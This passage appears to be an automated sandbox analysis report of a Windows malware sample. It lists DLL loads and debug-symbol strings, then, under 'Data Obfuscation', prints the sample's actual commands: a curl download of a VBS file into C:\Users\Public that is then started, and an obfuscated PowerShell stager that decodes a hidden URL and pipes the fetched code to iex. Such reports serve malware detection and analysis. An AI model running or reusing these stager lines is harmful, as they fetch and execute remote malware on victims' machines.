            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbe0899 source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ystem.Core.pdb` source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2433683508.0000024EBBFA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2351594130.000001CA6B3DD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2352549438.000001CA6B5E2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdban source: powershell.exe, 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000011.00000002.2351594130.000001CA6B3B3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: *e.pdb source: powershell.exe, 00000011.00000002.2352549438.000001CA6B584000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: powershell.exe, 00000011.00000002.2352549438.000001CA6B584000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.Core.pdbgRc2 source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb; source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC27C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC27C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbatYs source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2435362967.0000024EBC210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2351594130.000001CA6B3B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2352549438.000001CA6B5D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb[dhc source: powershell.exe, 00000011.00000002.2351594130.000001CA6B3B3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbL source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC27C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbEvX1 source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-downlo", "2", "true");IWshShell3.ExpandEnvironmentStrings("%PUBLIC%");IWshShell3.Run("cmd /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-downlo", "2", "true");IWshShell3.Run("cmd /V/D/c start C:\Users\Public\67618a47ee8cd.vbs", "2", "true");IWshShell3.ExpandEnvironmentStrings("%PUBLIC%");IWshShell3.Run("cmd /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-downlo", "2", "true");IWshShell3.Run("cmd /V/D/c start C:\Users\Public\67618a47ee8cd.vbs", "2", "true");IWshShell3.Run("cmd /V/D/c start C:\Users\Public\67618a47ee8cd.vbs", "2", "true")
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)Jump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD3451258D push eax; ret 15_2_00007FFD34512606
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD3451802D push ebx; ret 15_2_00007FFD3451816A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD345E172C push esp; retf FD8Fh15_2_00007FFD345E1A92
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD345E0DB1 pushad ; iretd 15_2_00007FFD345E0DD1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD345C1865 push esp; retf FD8Fh17_2_00007FFD345C1A92

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
